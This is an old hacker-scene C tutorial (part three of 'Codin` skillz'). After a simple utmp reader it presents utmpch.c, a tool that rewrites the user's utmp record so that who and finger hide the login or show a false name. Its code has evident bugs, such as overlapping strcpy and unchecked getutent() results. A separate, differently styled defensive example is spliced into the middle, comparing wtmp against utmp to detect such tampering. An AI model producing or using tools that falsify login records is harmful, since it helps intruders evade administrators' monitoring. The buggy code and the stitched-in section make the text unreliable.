Codin` skillz (3) by bugghy
/---------------\
| Codin` skillz |
\---------------/
v1.0a
Part three
Written by: Bugghy
E-mail: bugghy@home.ro
URL: www.bugghy.home.ro
Comments/errors/bugs/jokes > bugghy@home.ro
CONTENTS
=====================================
1. Introduction
2. Theory
3. CODE 3
4. Recommendations
5. Link of the day
6. Last words
=====================================
1. Introduction
===============
For all those leet out there ... plsplsplsprettyplswithsugarontop don't read
this ... too lame ... :)))
This will be a simple/basic utmp reader... with something more interesting
in the end ... Learn and practice ...
2. Theory
=========
w,who,finger and other programs extract info from /var/run/utmp ...
So we will exploit utmp :)
3. CODE 3
=========
----------utmp.c----------
#include <stdio.h>  // for printf()
#include <utmp.h>   // man utmp, also look in utmp.h
#include <fcntl.h>  // for open()
#include <unistd.h> // for read() and close()
#define UTMP "/var/run/utmp" // the file we're going to open
int main(void)
{
    int fd; // the file descriptor we will use to open the file
    struct utmp user; // man utmp, also utmp.h
    if ( (fd = open(UTMP,O_RDONLY)) == -1) // we open the utmp file for reading
    {
        printf("open() error\n");
        return 1; // no point in reading from an invalid descriptor
    }
    while ( read(fd,&user,sizeof(user)) == sizeof(user) ) // read until EOF (or a read error)
    // read() reads "sizeof(user)" bytes, from file descriptor "fd" into buffer "user"
    // basically it stores from utmp to user so we can retrieve our info
    {
        if ( user.ut_type == USER_PROCESS)
        {
            // this checks whether we have a user process (type 7), utmp.h describes this better
            // ut_user and ut_line are fixed-size fields that may lack a terminating NUL,
            // so we print them with an explicit maximum length
            printf("%.*s is on %.*s\n",(int)sizeof(user.ut_user),user.ut_user,
                   (int)sizeof(user.ut_line),user.ut_line);
            // we got a person on ... we print his name then his terminal
        }
    }
    close(fd);
    return 0;
}
----------utmp.c----------
OK, this was too basic ... Let's make some leet stuff..
----------utmpch.c----------
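#include <stdio.h>  // for printf()
#include <stdlib.h> // for system() and exit()
#include <string.h> // for strcmp(), strcpy() and strlen()
#include <unistd.h> // for ttyname()
#include <utmp.h>   // man utmp, also look in utmp.h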
#define UTMP "/var/run/utmp" // note : change this and the system() function
#define REMOVE 1
// change to 0 if you want an alternative login :)
// to 1 if you want to be removed from utmp
// and to 3 if you wanna reappear
#define ALTLOGIN "haxor" // only works if REMOVE is set to 0
main()
{
int us=0,i=0,j=0; // us = boolean, i = counter j = another counter
char *meontty; // the tty I'm on
struct utmp *user; // utmp structure, we need the pointer (*)
printf("Bugghy's utmp cleaner.. file saved in /tmp/.utmp.bak \n");
system("cp /var/run/utmp /tmp/.utmp.bak");
// we save utmp in case of problems
if ( REMOVE == 1)
printf(" Removing from utmp.. \n");
else if (REMOVE == 0)
printf(" Changing login to %s.. \n",ALTLOGIN);
else
{
printf("Use: Edit the defines to suit your needs + run proggie\n");
exit(-1);
}
utmpname(UTMP); // so that all other functions can access utmp
// man utmpname
printf("ttyname is: %s\n",ttyname(0));
// returns the name of the terminal device
meontty = (ttyname(0)+strlen("dev/"));
// only correct for ptys named /dev/...
// then we add 4 (to pass "dev/") so we get to our second '/' :)
strcpy(meontty,++meontty);
// after that we get the string one char longer by moving it one step further
setutent();
// this gets the file pointer to the beginning of the utmp file
// we don't need to open the utmp as we used utmpname() for the path to it
// What we have done until now is: get the device we were on, put it in a
// more suitable form, and prepare for searching in utmp
while( us==0 )
{
i++;
user = getutent();
// reads one line from utmp, and returns a pointer to the structure containing
// our values ... basically it gets the next user's info
if (strcmp(user->ut_line,meontty) == 0)
// if we are the user then end looping, the "i" var stores our place
us=1;
}
if ( REMOVE == 1 )
// if we wanna be invisible..
{
user->ut_type = LOGIN_PROCESS;
strcpy(user->ut_user,"LOGIN");
// type of login is LOGIN_PROCESS => "who" won't display you
// user name is LOGIN so "who -l" won't display you (on some systems)
} else
user->ut_type = USER_PROCESS;
// in case you removed yourself before, and now you wanna change name
if (REMOVE == 0) strcpy(user->ut_user,ALTLOGIN);
// basically we changed some data so we are a waiting terminal...
endutent();
pututline(user);
// we close the utmp file, we're done, we rest in peace (almost)
printf("If we are invisible and no errors occurred, rm -f /tmp/.utmp.bak\n");
system("who -l");
// a last advice
return 0;
}
----------utmpch.c----------
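The defender's side of utmpch.c, as an added example (not Bugghy's code): the program above edits only utmp, so the login it hides is still recorded in wtmp, and reconciling the two files exposes both the "LOGIN" relabel and the renamed login. The helper names (rec, is_latest, count_mismatches, demo_constructed) and the sample records are constructed for illustration; the check assumes wtmp itself was not edited and ignores reboot records.

```c
#include <stdio.h>
#include <string.h>
#include <utmp.h>

/* Build one record; ut_user and ut_line are fixed-size, not always NUL-terminated. */
static struct utmp rec(short type, const char *user, const char *line) {
    struct utmp u;
    memset(&u, 0, sizeof u);
    u.ut_type = type;
    strncpy(u.ut_user, user, sizeof u.ut_user);
    strncpy(u.ut_line, line, sizeof u.ut_line);
    return u;
}

/* Is w[i] the most recent wtmp record for its terminal line? */
static int is_latest(const struct utmp *w, size_t n, size_t i) {
    for (size_t k = i + 1; k < n; k++)
        if (!strncmp(w[k].ut_line, w[i].ut_line, sizeof w[i].ut_line)) return 0;
    return 1;
}

/* Count sessions that wtmp still shows as open (latest record on the line is a
   USER_PROCESS with a user name) but utmp no longer lists for that user and line. */
size_t count_mismatches(const struct utmp *w, size_t nw, const struct utmp *u, size_t nu) {
    size_t bad = 0;
    for (size_t i = 0; i < nw; i++) {
        if (!is_latest(w, nw, i) || w[i].ut_type != USER_PROCESS || !w[i].ut_user[0])
            continue;
        int seen = 0;
        for (size_t j = 0; j < nu; j++)
            if (u[j].ut_type == USER_PROCESS &&
                !strncmp(u[j].ut_line, w[i].ut_line, sizeof u[j].ut_line) &&
                !strncmp(u[j].ut_user, w[i].ut_user, sizeof u[j].ut_user))
                seen = 1;
        if (!seen) bad++;
    }
    return bad;
}

/* Constructed sample: pts/1 was relabelled LOGIN, pts/3 renamed, pts/2 logged out. */
size_t demo_constructed(void) {
    struct utmp w[] = { rec(USER_PROCESS, "alice", "pts/0"), rec(USER_PROCESS, "bob", "pts/1"),
                        rec(USER_PROCESS, "carol", "pts/2"), rec(DEAD_PROCESS, "", "pts/2"),
                        rec(USER_PROCESS, "dave", "pts/3") };
    struct utmp u[] = { rec(USER_PROCESS, "alice", "pts/0"), rec(LOGIN_PROCESS, "LOGIN", "pts/1"),
                        rec(DEAD_PROCESS, "", "pts/2"), rec(USER_PROCESS, "haxor", "pts/3") };
    return count_mismatches(w, 5, u, 4);
}

int main(void) { printf("%zu mismatches\n", demo_constructed()); return 0; }
```

On a live system the two arrays would be filled by reading /var/log/wtmp and /var/run/utmp with the same read() loop as utmp.c.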
4. Recommendations
==================
Now you probably wonder what my explanations mean ... To understand the
subject pls use man to get info on: utmp, who, open(2) and cat /usr/include/utmp.h
After you've read them you should have a basic understanding of how utmp
works.
BTW: open(2) = "$ man 2 open"
5. Link of the day
==================
A huge database of wargames: http://hackergames.net
6. Last words
=============
utmp.h has other options ... play with them and make a proggie that reads
all the options in utmp.h, and lets you change them. That's leetness :)))
If you wanna clarify some misunderstandings in the text, add something,
bugs/comments/... mail bugghy@home.ro
THE USUAL DISCLAIMER:
---------------------
This file is for [of course] informational purposes only. I
don't take responsibility for anything anyone does after reading this file.
Gr33tz:
vMatriCS.nET , anyone that helped me (they know who they are)
All rights reserved © www.pc-dojo.ro. Reproduction is permitted only with the consent of the author or of the site.